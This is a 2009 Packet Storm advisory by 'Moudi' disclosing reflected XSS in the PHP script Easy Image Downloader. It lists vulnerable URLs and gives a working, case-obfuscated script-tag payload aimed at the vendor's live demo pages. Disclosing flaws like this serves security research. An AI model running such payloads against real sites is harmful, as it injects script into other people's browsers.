Easy Image Downloader Cross Site Scripting

2009-07-14T00:00:00
ID PACKETSTORM:79203
Type packetstorm
Reporter Moudi
Modified 2009-07-14T00:00:00

Description

                                        
                                            `###########################################################################  
#-----------------------------I AM MUSLIM !!------------------------------#  
###########################################################################  
  
==============================================================================  
_ _ _ _ _ _   
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]  
==============================================================================  
[»] Easy Image Downloader Remote XSS vulnerability  
==============================================================================  
  
[»] Script: [ Easy Image Downloader ]  
[»] Language: [ PHP ]  
[»] Download: [ http://www.scriptsez.net/index.php?action=details&cat=Content%20Management&id=1172650042 ]  
[»] Founder: [ Moudi <m0udi@9.cn> ]  
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]  
[»] Team: [ EvilWay ]  
[»] Dork: [ OFF ]  
[»] Price: [ 6.00 US Dollars ]  
  
###########################################################################  
  
===[ Exploit XSS vulnerability ]===   
  
[»] http://www.site.com/patch/demo_page.php?action=detail&id=[XSS]  
[»] http://www.site.com/patch/main.php?action=detail&id=[XSS]  
  
===[ Exploit DEMO ONLINE ]===   
  
[»] http://demo.scriptsez.net:80/easy_image/demo_page.php?action=detail&id=  
XSS TO ADD: 1>'><ScRiPt%20%0a%0d>alert(310654731284)%3B</ScRiPt>  
  
[»] http://demo.scriptsez.net:80/easy_image/main.php?action=detail&id=  
XSS TO ADD: 1>'><ScRiPt%20%0a%0d>alert(334415002616)%3B</ScRiPt>  
  
Author: Moudi  
  
###########################################################################  
`